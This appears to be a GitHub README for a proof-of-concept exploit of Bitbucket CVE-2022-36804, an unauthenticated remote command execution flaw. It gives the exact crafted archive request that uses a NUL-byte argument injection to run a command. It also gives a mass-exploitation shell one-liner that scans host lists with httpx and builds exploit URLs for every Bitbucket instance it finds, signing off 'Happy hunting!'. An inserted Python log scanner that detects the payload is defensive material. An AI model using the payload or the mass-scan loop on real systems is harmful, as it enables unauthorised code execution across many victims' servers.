kljunowsky / CVE-2022-36804-POC

Bitbucket CVE-2022-36804 unauthenticated remote command execution

Home Page: https://shiftsecurityconsulting.com/

CVE-2022-36804-POC 🕷️

Bitbucket CVE-2022-36804 unauthenticated remote command execution

Exploitation

Find publicly visible repositories - example.com/repos?visibility=public

/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin
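
A defender-side check for the request shape above, added here as an example and not part of the original repository: it scans web access logs for archive requests whose decoded query parameters contain a NUL byte (`%00`) or a NUL-separated piece that begins with `--`. It assumes combined-format access logs; the function names, log lines, project path and status codes are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# REST archive endpoint under any project path.
ARCHIVE_RE = re.compile(r"^/rest/api/[^/]+/projects/.+/archive$")

def suspicious_params(target):
    """Return sorted (parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    if not ARCHIVE_RE.match(parts.path):
        return []
    findings = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\x00" in value:  # a decoded %00 has no place in these values
            findings.add((name, "NUL byte"))
        # A NUL-separated piece starting with "--" reads as a command-line option.
        if any(piece.startswith("--") for piece in value.split("\x00")):
            findings.add((name, "option-like token"))
    return sorted(findings)

def scan(lines):
    """Return [(line_number, findings)] for log lines that match."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        found = suspicious_params(match.group("target")) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample log lines: documentation addresses, made-up project
# path, placeholder status codes and sizes.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2022:10:00:01 +0000] "GET /rest/api/latest/projects/DEMO/repos/sample/archive?at=refs%2Fheads%2Fmain&format=zip&prefix=release-1.0%2F HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Sep/2022:10:00:05 +0000] "GET /rest/api/latest/projects/DEMO/repos/sample/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Sep/2022:10:00:09 +0000] "GET /repos?visibility=public HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```

Matching on the decoded value rather than the raw string also catches variants that encode the dashes or use a different parameter than `prefix`.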

Mass Exploitation

for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done

Visit crafted URLs :)

Happy hunting! 🐺

License: MIT License


Languages

Language: Python 100.0%